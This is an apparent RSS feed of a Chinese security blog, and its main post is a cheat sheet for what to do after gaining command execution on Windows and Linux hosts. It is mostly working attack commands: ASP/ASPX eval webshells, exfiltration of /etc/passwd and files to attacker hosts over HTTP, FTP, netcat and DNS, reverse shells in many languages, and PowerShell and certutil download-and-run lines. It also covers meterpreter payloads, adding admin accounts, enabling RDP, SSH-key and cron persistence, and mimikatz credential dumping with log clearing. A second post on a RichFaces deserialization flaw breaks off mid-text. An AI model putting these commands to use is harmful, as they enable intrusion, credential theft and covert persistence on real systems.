{"@attributes":{"version":"2.0"},"channel":{"title":"whynot","description":"\u6b22\u8fce\u6765\u5230\u6211\u7684\u535a\u5ba2~","link":"http:\/\/notwhy.github.io\/","pubDate":"Tue, 27 Nov 2018 04:32:53 +0000","lastBuildDate":"Tue, 27 Nov 2018 04:32:53 +0000","generator":"Jekyll v3.7.4","item":[{"title":"\u547d\u4ee4\u6267\u884c\u603b\u7ed3","description":"<h1 id=\"0x00-\u524d\u8a00\">0x00 \u524d\u8a00<\/h1>\n<p>\u547d\u4ee4\u6267\u884c\u540e\u6709\u5173\u7684\u4e00\u4e9b\u5f52\u7eb3(\u6301\u7eed\u8865\u5145)\u3002<\/p>\n<h1 id=\"0x01-\u57fa\u7840\u8be6\u60c5\">0x01 \u57fa\u7840\u8be6\u60c5<\/h1>\n<p>\u9488\u5bf9\u547d\u4ee4\u6267\u884c\u540e\u5bf9\u7cfb\u7edf\u505a\u66f4\u6df1\u5165\u7684\u6e17\u900f\uff0c\u5e38\u89c4\u5148\u5224\u65ad\u7cfb\u7edf\u7c7b\u578b\uff0c\u547d\u4ee4\u662f\u5426\u56de\u663e\uff0c\u4ee5\u53ca\u76ee\u6807\u7cfb\u7edf\u662f\u5426\u80fd\u591f\u51fa\u7f51\uff0c\u5373\u7cfb\u7edf\u7c7b\u578b-&gt;\u662f\u5426\u56de\u663e-&gt;\u80fd\u5426\u51fa\u7f51\u3002<\/p>\n<h2 id=\"1\u53ef\u56de\u663e\">1.\u53ef\u56de\u663e<\/h2>\n<p>webshell(apache tomcat nginx\u7b49\u53ef\u76f4\u63a5\u89e3\u6790\u811a\u672c\u7684\u5199\u5165webshell)<\/p>\n<h3 id=\"window\">window<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>dir \/s\/a-d\/b d:\\*123456.asp  #\u67e5\u627e123456.asp \u4f4d\u7f6e\necho ^&lt;^%eval request^(chr^(35^)^)^%^&gt; &gt; \"d:\\JINHER\\C6\\JHSoft.Web.Login\\images\\LoginTemplate\\whynot.asp\" # &lt;&gt;\u7b49\u7279\u6b8a\u7b26\u53f7\u5728cmd\u4e0b\u9700\u8981\u8f6c\u7801 \u800c\u4e14\u5199\u5165\u6587\u4ef6\u4e0d\u53ef\u5e26\u6709&lt;&gt;:\u7b49\u7279\u6b8a\u5b57\u7b26\ncopy c:\\\\Inetpub\\\\wwwroot\\\\ckfinder\\\\userfiles\\\\files\\\\images\\\\cknife.jpg c:\\\\Inetpub\\\\wwwroot\\\\ckfinder\\\\userfiles\\\\files\\\\images\\\\cknife.aspx # \u547d\u4ee4\u4e0d\u597d\u4f7f\u65f6\u5c1d\u8bd5\u5176\u4ed6\u547d\u4ee4 \n\nfor \/F %s in ('dir \/s\/a-d\/b c:\\*.aspx') do echo 123 &gt;123.aspx\n\u5728\u6709aspx\u6587\u4ef6\u7684\u540e\u9762\u91cd\u65b0\u751f\u6210.aspx\u7684\u540e\u7f00 \u5185\u5bb9\u4e3a123 \u4f8b\u5982a.aspx \u751f\u6210a.aspx.aspx   #\u7f3a\u70b9\u76f8\u5bf9\u66b4\u529b \u4f18\u70b9\u4e0d\u56de\u663e\u6709\u65f6\u5019\u4e5f\u53ef\u4ee5\u7528\nfor \/F %s in ('dir \/s\/a-d\/b f:\\*login.css') do echo ^&lt;%@ Page Language=\"Jscript\"%^&gt;^&lt;%eval(Request.Item[\"pass\"],\"unsafe\");%^&gt; &gt;%s.aspx\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"linux\">linux<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>locate find\u7b49\u547d\u4ee4 \u67e5\u8be2\u6587\u4ef6\u4f4d\u7f6e\necho PD9waHAgcGhwaW5mbygpOz8+ | base64 -d &gt; 360.php   #PD9waHAgcGhwaW5mbygpOz+\u662f&lt;?php phpinfo();?&gt; base64\u7f16\u7801 linux\u6587\u4ef6\u540d\u4e0d\u80fd\u5e26\u6709\/(\u659c\u6760)\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"oobout-of-band-\u65e0\u6cd5\u56de\u663e\u548c\u80fd\u51fa\u7f51\u65f6\u4f7f\u7528\">OOB(out of band) (\u65e0\u6cd5\u56de\u663e\u548c\u80fd\u51fa\u7f51\u65f6\u4f7f\u7528)<\/h3>\n<p>window<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u57fa\u4e8eOOB(out of band)\u7684\u56de\u663e(\u80fd\u51fa\u7f51)\nfor \/F %s in ('whoami') do start http:\/\/10,10.10.10:8080\/?user=%s   #\u67e5\u8be2\u6587\u4ef6\u4f4d\u7f6eweb\u5386\u53f2\u8bb0\u5f55 \u4f1a\u6253\u5f00\u76ee\u6807\u6d4f\u89c8\u5668\nfor \/F %s in ('dir \/b') do start http:\/\/10.10.10.10:81\/?user=%s\n\ncurl \u2013T {path to file} ftp:\/\/xxx.xxx.xxx.xxx \u2013user {username}:{password}    #\u4f20\u8f93\u5230ftp\nwget \u2013header=\"EVIL:$(cat \/etc\/passwd)\" http:\/\/xxx.xxx.xxx:xxxx  #\u9700\u8981\u81ea\u642d\u5efaserver\u670d\u52a1\u5668\u652f\u6301\n#wget \u2013header=\u201devil:`cat \/etc\/passwd | xargs echo \u2013n`\u201d http:\/\/xxx.xxx.xxx:xxxx \n\nwget \u2013post-data exfil='cat \/etc\/passwd' http:\/\/dnsattacker.com           # extract data  in post section\nwget \u2013post-file trophy.php http:\/\/dnsattacker.com    # extract source code\ncat \/path\/to\/sensitive.txt | curl \u2013F \":data=@-\" http:\/\/dnsattacker.com\/test.txt\n\nViticm\nnc -w 1000 10.10.10.10 1234 &lt; config.php\nAttacker\nnc -l 1234 &gt; config.php\n<\/code><\/pre><\/div><\/div>\n<p>linux<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u57fa\u4e8eOOB(out of band)\u7684\u56de\u663e\n#curl `whoami`.xxxx.xxx(\u5b50\u57df\u540d)     #\u53ef\u4ee5\u7528\u8be5\u65b9\u6cd5\u628a\u4e0d\u56de\u663e\u53d8\u5f97\u56de\u663e\n#curl http:\/\/10.10.10.10:81\/?user=`id`\n#wget http:\/\/10.10.10.10:81\/?user=`id`\n#ping %USERNAME%.b182oj.ceye.io\n#ping -c 3 `ifconfig en0|grep \"inet \"|awk '{print $2}'`.test.xxx.com DNS\u8bb0\u5f55\u83b7\u53d6\u6e90IP\uff08\u6839\u636e\u60c5\u51b5\u9700\u8981\u4fee\u6539\uff0c\u4e0d\u901a\u7528\uff09\n<\/code><\/pre><\/div><\/div>\n<p>\u901a\u7528\u7684\u4e00\u4e9b<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u9700\u8981\u57df\u540d\u670d\u52a1\u5668\u652f\u6301\nVictim  #\u53c2\u8003https:\/\/www.exploit-db.com\/docs\/english\/45370-out-of-band-exploitation-(oob)-cheatsheet.pdf \ncmd \/v \/c \"ipconfig &gt; output &amp;&amp; certutil -encodehex -f output output.hex 4 &amp;&amp; powershell $text=GetContentoutput.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){$final=$j.tostring()+'.'+$i+'.fzrsuf.3w1.pw';$j += 1; nslookup $final }\" \nAttacker\nsudo tcpdump -n port 53 | tee file.txt\necho \"0x$(cat file.txt |tr ' ' '\\n' |awk '\/file.oob.dnsattacker.com\/ {print $1}'|sort -u| cut -d '.' -f 2|tr -d '\\n')\" | xxd -r -pr\n\nVictim\nwget --header=evil:$(ifconfig|xxd -p -c 100000) http:\/\/dnsattacker.com:9000\nAttacker:\necho \"0x$(ncat -lvp 9000 |grep -i evil|tr -d '\/' |cut -d ' ' -f2)\" |xxd -r -p\n<\/code><\/pre><\/div><\/div>\n<p><img src=\"https:\/\/ws2.sinaimg.cn\/large\/006tNbRwly1fv84afj8z6j31aw0kmajx.jpg\" alt=\"\" \/><\/p>\n<h2 id=\"2\u53ef\u51fa\u7f51\">2.\u53ef\u51fa\u7f51<\/h2>\n<p>\u53cd\u5f39shell\u6216\u4f20\u9a6c(\u4f7f\u7528tcpdump -i eth0 icmp \u6765\u76d1\u542c\u6216\u8005\u642d\u5efaweb\u670d\u52a1\u5668\u67e5\u770b\u8bbf\u95ee\u65e5\u5fd7\u7b49\u6765\u80fd\u5426\u51fa\u7f51\uff09\u3002<\/p>\n<h3 id=\"window--\u4f7f\u7528ping-\u6216\u8005\u4e0b\u9762\u7684download\u6765\u5224\u65ad\u662f\u5426\u80fd\u591f\u51fa\u7f51\">window  \u4f7f\u7528ping \u6216\u8005\u4e0b\u9762\u7684download\u6765\u5224\u65ad\u662f\u5426\u80fd\u591f\u51fa\u7f51\uff0c<\/h3>\n<p>powershell\u76f4\u63a5\u53cd\u5f39(03\u9ed8\u8ba4\u65e0powershell winserver08\u9ed8\u8ba4\u662f2.0\uff09<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>powershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/8.8.8.8\/nishang\/Shells\/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 8.8.8.8 -port 8888 #\u53cd\u5f39shell\npowershell -C \"IEX (New-Object System.Net.Webclient).DownloadString('https:\/\/raw.githubusercontent.com\/besimorhino\/powercat\/master\/powercat.ps1');powercat -l -p 8888\"  #\u76d1\u542c\u672c\u5730nc\n\nhttp:\/\/8.8.8.8\/2.php?id=1;exec master..xp_cmdshell 'powershell IEX(New-Object Net.WebClient).DownloadString(''http:\/\/youvps\/Empire\/data\/module_source\/code_execution\/Invoke-Shellcode.ps1'');Invoke-Shellcode -payload windows\/meterpreter\/reverse_http -lhost 8.8.8.8 -lport 4444 -force';--   #powershell\u8c03\u7528msf\u53cd\u5f39\n\nIEX (New-Object Net.WebClient).DownloadString('http:\/\/8.8.8.8\/nishang\/Scan\/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254   #\u626b\u63cf\u7aef\u53e3\n<\/code><\/pre><\/div><\/div>\n<p>msf\u6216\u8005nc\u6216\u8005colbat strike\u4f20\u9a6c\u7b49(msf\u4e3a\u4f8b)<\/p>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u751f\u6210\u6076\u610f\u7a0b\u5e8f\u4e0a\u4f20\u6267\u884c\nmsfvenom -p windows\/meterpreter\/reverse_tcp -b '\\x00\\xff' lhost=8.8.8.8 lport=8888 -f dll -o test.dll\nregsvr32 test.dll   #\u8fd0\u884cdll\n\nattacker\u76d1\u542c\nuse exploit\/multi\/handler\nset payload windows\/meterpreter\/reverse_tcp\nset LHOST 8.8.8.8\nset LPORT 8888\nexploit\n\nnc -vv 115.28.206.51 8080 -e c:\\cmd.exe \/\/\u94fe\u63a5\u5230\u8fdc\u7a0b \u4e0d\u8f93\u5165-e\u9009\u9879\u5373\u65f6\u804a\u5929\nnc -lvvp 8080   \/\/\u53cd\u5f39\nnc -nv 8.8.8.8 8080 -e C:\\Windows\\System32\\cmd.exe\nnc -lvp 8080\n<\/code><\/pre><\/div><\/div>\n<p>\u76f4\u63a5\u6dfb\u52a0\u7528\u6237<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>net user xxx 123!@#qwe \/add     #\u6dfb\u52a0\u7528\u6237\nnet localgroup administrators xxx \/add  #\u5c06xxx\u7528\u6237\u52a0\u5165\u7ba1\u7406\u5458\nnet user xxx \/del   #\u5220\u9664\u7528\u6237\n\nfor 03 08\nREG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server \/v fDenyTSConnections \/t REG_DWORD \/d 00000000 \/f  #\u5f00\u542f3389 03 08\u6d4b\u8bd5\u901a\u8fc7\nREG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server \/v fDenyTSConnections \/t REG_DWORD \/d 00000001 \/f  #\u5173\u95ed3389\nREG query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server\\WinStations\\RDP-Tcp \/v PortNumber #\u67e5\u770b\u8fdc\u7a0b\u7aef\u53e3 \u5341\u516d\u8fdb\u5236\n\n2.\u901a\u7528\u5f003389(\u4f18\u5316\u540e)\uff1a\nwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\n3.For Every:\ncmd\u5f003389 win08 win03 win7 win2012 winxp\nwin08\uff0c\u4e09\u6761\u547d\u4ee4\u5373\u53ef:\nwmic \/namespace:\\root\\cimv2        erminalservices path win32_terminalservicesetting where (__CLASS != \"\") call setallowtsconnections 1\nwmic \/namespace:\\root\\cimv2        erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" \/v fSingleSessionPerUser \/t REG_DWORD \/d 0 \/f\nwin2012\u901a\u7528\uff1bwin7\u524d\u4e24\u6761\u5373\u53ef\u3002\u6743\u9650\u9700\u8981run as administrator\u3002\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"linux-1\">linux<\/h3>\n\n<ol>\n  <li>linux\u81ea\u5e26perl python ruby\u7b49\u8bed\u8a00\uff0c\u53cd\u5f39shell\u8f83\u4e3a\u5bb9\u6613 \u4e2a\u4eba\u5efa\u8bae\u4f7f\u7528bash perl<\/li>\n<\/ol>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u5224\u65ad\u80fd\u5426\u51fa\u7f51\n\/usr\/bin\/curl\n\/usr\/bin\/wget\n\/bin\/ping\n\u5982\u679c\u62c5\u5fc3\u5f15\u53f7\u8f6c\u4e49\u9ebb\u70e6\u6216\u7740\u5176\u4ed6 \u53ef\u4ee5\u76f4\u63a5\u4e0b\u8f7d\u5230\u670d\u52a1\u5668\u4e0a\u6267\u884c\nwget http:\/\/10.0.0.1\/123344\/back.pl -P \/tmp\/   \u53bb\u6389\u524d\u7f00\u811a\u672c\nperl \/tmp\/back.pl\n\ncurl `whoami`.xxxx.xxx(\u5b50\u57df\u540d)     #\u53ef\u4ee5\u7528\u8be5\u65b9\u6cd5\u628a\u4e0d\u56de\u663e\u53d8\u5f97\u56de\u663e\n\nbash\u53cd\u5f39\nbash -i &gt;&amp; \/dev\/tcp\/10.0.0.1\/8080 0&gt;&amp;1\n\n\u4e0a\u4f20bash\u6587\u4ef6\n#!\/bin\/bash\\n\\n\/bin\/bash -i &gt;&amp; \/dev\/tcp\/$1\/$2 0&gt;&amp;1\n\nPERL\nperl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&gt;&amp;S\");open(STDOUT,\"&gt;&amp;S\");open(STDERR,\"&gt;&amp;S\");exec(\"\/bin\/sh -i\");};'\n\nPython\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'\n\nPHP\nphp -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'\nIf you want a .php file to upload, see the more featureful and robust php-reverse-shell.\n\nRuby\nruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"\/bin\/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d\",f,f,f)'\n\nNetcat\nnc -e \/bin\/sh 10.0.0.1 1234\n\u90e8\u5206\u7248\u672cnc -e\u4e0d\u53ef\u7528\u65f6\nrm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;\/tmp\/f\n\n\nJava\nr = Runtime.getRuntime()\np = r.exec([\"\/bin\/bash\",\"-c\",\"exec 5&lt;&gt;\/dev\/tcp\/10.0.0.1\/2002;cat &lt;&amp;5 | while read line; do \\$line 2&gt;&amp;5 &gt;&amp;5; done\"] as String[])\np.waitFor()\n\nnode.js\nrequire('child_process').exec('bash -i &gt;&amp; \/dev\/tcp\/8.8.8.8\/80 0&gt;&amp;1');\nnc -lvvp 80\n\nlua\nlua -e \"require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3');\"\n<\/code><\/pre><\/div><\/div>\n\n<p>2.\u975e\u4ea4\u4e92\u5f0f\u6dfb\u52a0linux\u7528\u6237<\/p>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>useradd -m test\necho \"123456\" | passwd --stdin test #\u975e\u4ea4\u4e92\u5f0f\u8bbe\u7f6e\u5bc6\u7801\nuserdel -r test     #\u5220\u9664\u8be5\u7528\u6237\n<\/code><\/pre><\/div><\/div>\n<p>3.\u5199\u5165.ssh\/authorized_keys \u6216\u8005 crontab<\/p>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>echo \u516c\u94a5 &gt; .ssh\/authorized_keys\n\/var\/spool\/cron\/root    #centos \u5199\u5165root\u7528\u6237\u4efb\u52a1\u8ba1\u5212\n\/etc\/cron.d\/shell   #debian \u5728\/etc\/cron.d\/\u4f1a\u88ab\u5f53\u4f5c\u4efb\u52a1\u8ba1\u5212\u6267\u884c\n<\/code><\/pre><\/div><\/div>\n<h2 id=\"3\u5bc6\u7801\u6293\u53d6\">3.\u5bc6\u7801\u6293\u53d6<\/h2>\n<h3 id=\"\u901a\u7528-\u6ce8\u610f\u5bc6\u7801\u6293\u53d6\u9700\u8981root\u6743\u9650\">\u901a\u7528 \u6ce8\u610f\u5bc6\u7801\u6293\u53d6\u9700\u8981root\u6743\u9650\u3002<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>laz.exe all #\u901a\u7528\u53ef\u4ee5\u6293\u53d6wifi\u5bc6\u7801,\u5e38\u89c1\u6d4f\u89c8\u5668(\u5982google facebook\u767b\u9646\u5bc6\u7801)\uff0c\u6570\u636e\u5e93\uff0coutlook\u90ae\u7bb1\u4ee5\u53ca\u64cd\u4f5c\u7cfb\u7edf\u7b49\u5404\u79cd\u5bc6\u7801     #https:\/\/github.com\/AlessandroZ\/LaZagne   \n<\/code><\/pre><\/div><\/div>\n<h3 id=\"window-1\">window<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u63d0\u6743\u53c2\u8003    #https:\/\/github.com\/SecWiki\/windows-kernel-exploits\npowershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/8.8.8.8\/123344\/PowerShell\/Invoke-ReflectivePEInjection\/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http:\/\/8.8.8.8\/123344\/ms15-051.exe -ExeArgs \"cmd\" -ForceASLR #\u8fdc\u7a0b\u6267\u884cexe\nmimikatz    #\u6293\u53d6\u5bc6\u7801\nmimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\"  #https:\/\/github.com\/gentilkiwi\/mimikatz\npowershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/8.8.8.8\/nishang\/Gather\/Invoke-Mimikatz.ps1');Invoke-Mimikatz  #\u8fdc\u7a0b\u8c03\u7528mimikaz  web\u4e2d\u6ce8\u610f\u5f15\u53f7\nmimikaz\u6e05\u9664\u767b\u9646\u7b49\u65e5\u5fd7\u4fe1\u606f\nprivilege::debug\nevent::drop\nevent::clear\n<\/code><\/pre><\/div><\/div>\n<h3 id=\"linux-2\">linux<\/h3>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>.\/mimipenguin   #\u652f\u6301ubuntu\u548cFedora\u90e8\u5206\u7248\u672c https:\/\/github.com\/huntergregal\/mimipenguin\nlinux\u63d0\u6743\u597d\u7528\u7684\u4e00\u4e9b\u5de5\u5177\nhttps:\/\/github.com\/rebootuser\/LinEnum\nhttps:\/\/github.com\/mzet-\/linux-exploit-suggester\nhttps:\/\/github.com\/SecWiki\/linux-kernel-exploits\n<\/code><\/pre><\/div><\/div>\n\n<h2 id=\"4\u4e0b\u8f7d\u6267\u884cdownload-and-exec\">4.\u4e0b\u8f7d\u6267\u884c(download and exec)<\/h2>\n<ul>\n  <li>window<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>powershell\npowershell (new-object System.Net.WebClient).DownloadFile('https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe','c:\\download\\a.exe');start-process 'c:\\download\\a.exe'\n\ncertutil    #03 08\u90fd\u53ef\u4ee5\ncertutil -urlcache -split -f https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe c:\\download\\a.exe&amp;&amp;c:\\download\\a.exe\ncertutil -urlcache -split -f http:\/\/8.8.8.802:80\/a.txt b.txt\ncertutil -urlcache -split -f http:\/\/8.8.8.802:80\/a a.js &amp;&amp; cscript a.js &amp;&amp;  del a.js &amp;&amp; certutil -urlcache -split -f http:\/\/8.8.8.802:80\/a delete  #\u8fdc\u7a0b\u6267\u884cjs\ncertutil -urlcache -split -f http:\/\/8.8.8.8\/123344\/1.vbs a.vbs &amp;&amp; cscript a.vbs &amp;&amp;  del a.vbs &amp;&amp; certutil -urlcache -split -f http:\/\/8.8.8.8\/123344\/1.vbs delete    #\u52a0\u8f7dvbs\u6267\u884c\nvbs \u793a\u4f8b\u4ee3\u7801    #\u4e0b\u8f7d\u4fdd\u5b58\u5230c\u76d8\nSet xPost=createObject(\"Microsoft.XMLHTTP\")\nxPost.Open \"GET\",\"http:\/\/192.168.206.101\/file.zip\",0\nxPost.Send()\nset sGet=createObject(\"ADODB.Stream\")\nsGet.Mode=3\nsGet.Type=1\nsGet.Open()\nsGet.Write xPost.ResponseBody\nsGet.SaveToFile \"c:\\file.zip\",2\n\nwin03\u65e0 xp\u4ee5\u540e\u81ea\u5e26   #\u4e0b\u8f7d\u901f\u5ea6\u8f83\u6162\nbitsadmin \/transfer n http:\/\/lemon.com\/file.zip c:\\1.zip\nbitsadmin \/transfer n http:\/\/8.8.8.8\/mimikaz.exe Z:\/file\/proof\/tmp\/1.exe\nbitsadmin \/transfer n http:\/\/download.sysinternals.com\/files\/PSTools.zip C:\\test\\update\\PSTools.zip\nbitsadmin \/rawreturn \/transfer getfile http:\/\/download.sysinternals.com\/files\/PSTools.zip c:\\p.zip\n\ncsscript \ncscript \/b C:\\Windows\\System32\\Printing_Admin_Scripts\\zh-CN\\pubprn.vbs 127.0.0.1 script:https:\/\/gist.githubusercontent.com\/enigma0x3\/64adf8ba99d4485c478b67e03ae6b04a\/raw\/a006a47e4075785016a62f7e5170ef36f5247cdb\/test.sct    #\u8fdc\u7a0b\u6267\u884c\u6587\u4ef6\u5f39\u51fa\u8ba1\u7b97\u5668\n\ntelnet  \n\u670d\u52a1\u7aef\uff1anc -lvp 23 &lt; nc.exe\n\u4e0b\u8f7d\u7aef\uff1atelnet ip -f c:\\nc.exe\n\nregsvr32\nregsvr32 \/u \/s \/i:https:\/\/raw.githubusercontent.com\/3gstudent\/test\/master\/downloadexec.sct scrobj.dll\n\nrundll32  \nrundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";o=GetObject(\"script:http:\/\/webserver\/payload.sct\");window.close();\n\n\nmshta\nmshta https:\/\/3gstudent.github.io\/test\/downloadexec2.hta    #\u9700\u8981\u5f00\u542fIE\u6d4f\u89c8\u5668-Internet\u9009\u9879-\u5b89\u5168\u9009\u62e9\u53ef\u4fe1\u7ad9\u70b9\uff0c\u6dfb\u52a0\u535a\u5ba2\u5730\u5740\uff1ahttps:\/\/3gstudent.github.io\/\n\nwmic and Regasm\/Regsvc\nwmic os get \/format:\"https:\/\/webserver\/payload.xsl\"\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe \/u \\\\webdavserver\\folder\\payload.dll\n\n<\/code><\/pre><\/div><\/div>\n<ul>\n  <li>linux<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>linux\u65b9\u6cd5\u901a\u7528\uff0c\u8fd9\u91cc\u4e0d\u8bb2\u8ff0\u8fc7\u591a \u8be6\u60c5\u53ef\u53c2\u8003 https:\/\/gtfobins.github.io\/\nwget www.baidu.com\/1.rar -P \/tmp\/ #\u4fdd\u5b58\u5230tmp\u76ee\u5f55\u4e0b\ncurl $URL -o $LFILE\nnc\nlua\n<\/code><\/pre><\/div><\/div>\n<p>\u76f8\u5173\u94fe\u63a5\u5982\u4e0b\uff1a<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>https:\/\/github.com\/samratashok\/nishang  #powershell\u6846\u67b6\nhttps:\/\/github.com\/EmpireProject\/Empire\nhttps:\/\/github.com\/PowerShellMafia\/PowerSploit\nhttps:\/\/arno0x0x.wordpress.com\/2017\/11\/20\/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code\/\nhttps:\/\/3gstudent.github.io\/3gstudent.github.io\/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8Egithub%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6%E7%9A%84%E5%A4%9A%E7%A7%8D%E6%96%B9%E6%B3%95\/\nhttps:\/\/gtfobins.github.io\/\nhttp:\/\/reverse-tcp.xyz\/pentest\/red%20team\/2017\/12\/28\/windows-to-download-and-execute-arbitrary-code.html\nhttps:\/\/www.exploit-db.com\/docs\/english\/45370-out-of-band-exploitation-(oob)-cheatsheet.pdf\n<\/code><\/pre><\/div><\/div>\n<p>#\n\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/2018\/09\/\u547d\u4ee4\u6267\u884c\u603b\u7ed3\/\">web<\/a><\/p>\n\n","pubDate":"Wed, 12 Sep 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/09\/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%80%BB%E7%BB%93\/","guid":"http:\/\/notwhy.github.io\/2018\/09\/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%80%BB%E7%BB%93\/","category":"web"},{"title":"RichFaces\u53cd\u5e8f\u5217\u8bdd\u6f0f\u6d1e\u2014\u2014CVE-2013-2165","description":"<h1 id=\"0x00-\u524d\u8a00\">0x00 \u524d\u8a00<\/h1>\n<hr \/>\n<p>\u2003\u2003\u672c\u6765\u60f3\u5b66\u4e8c\u8fdb\u5236\u6765\u7740,java\u53c8\u51fa\u4e86\u90a3\u4e48\u591a\u6f0f\u6d1e\uff0c\u8eab\u4e3a\u4e00\u4e2aweb\u5b89\u5168\u72d7\uff0c\u8fd8\u662f\u5b66Java web\u5427\uff0c\u51e0\u4e4e0\u57fa\u7840\uff0c\u5927\u725b\u8bf7\u8df3\u8fc7\u3002\u78b0\u5de7\u5de5\u4f5c\u4e2d\u9047\u5230\u5b9e\u4f8b\uff0c\u5c31\u5c1d\u8bd5\u7b80\u5355\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a(\u5f88\u6c34\u7684\u4e00\u7bc7\u6587\u7ae0\u56db\u5904\u6458\u6284\uff0c\u5c31\u662f\u60f3\u7acb\u4e2aflag\u5f00\u4e2a\u5934)\u3002<\/p>\n<h1 id=\"0x01-\u57fa\u7840\u8be6\u60c5\">0x01 \u57fa\u7840\u8be6\u60c5<\/h1>\n<p>\u5728\u8bb2\u8ff0\u4e4b\u524d\u5148\u7b80\u5355\u4ecb\u7ecd\u4e00\u4e0bjava\u53cd\u5e8f\u5217\u5316\u7684\u4e00\u4e9b\u7279\u5f81\u3002<br \/>\n\u9ed1\u76d2\u6d4b\u8bd5:<\/p>\n<ol>\n  <li>rO0AB   #\u6570\u636e\u5305\u4e2d\u6709\u4ee5base64\u5f00\u5934\u7684\u6570\u636e\u5f00\u5934\u542b\u6709ro0AB yseriol\u751f\u6210\u7684payload\u8f6c\u6362\u800c\u6765 cat payload.out | base64 -w 0 &gt; payload.out.b64\n<img src=\"https:\/\/ws3.sinaimg.cn\/large\/0069RVTdly1fv4fptk2sdj30pa0bstig.jpg\" alt=\"\" \/><\/li>\n  <li>aced 0005   #\u6570\u636e\u5305\u53d1\u9001\u65f616\u8fdb\u5236\u67e5\u770b\u65f6\u542b\u6709\u7684\u7279\u6b8a\u5b57\u7b26 \u5982\u679c\u662fhttp\u6570\u636e\u5305\u542b\u6709 sr \u7b49\u5b57\u7b26\n<img src=\"https:\/\/ws3.sinaimg.cn\/large\/0069RVTdly1fv4kqos4kcj31au09kn15.jpg\" alt=\"\" \/><\/li>\n  <li>content-type:application\/x-serialization \u5e26\u6709\u5e8f\u5217\u5316\u5934\u8bf4\u660e\u4e86\u5b83\u662f\u662f\u5e8f\u5217\u5316\u6570\u636e\n<img src=\"https:\/\/ws4.sinaimg.cn\/large\/0069RVTdly1fv4k2j9n6bj31ku0fa43h.jpg\" alt=\"\" \/><\/li>\n  <li>org.apache.commons.collections.functors.InvokerTransformer and gzip header\n<img 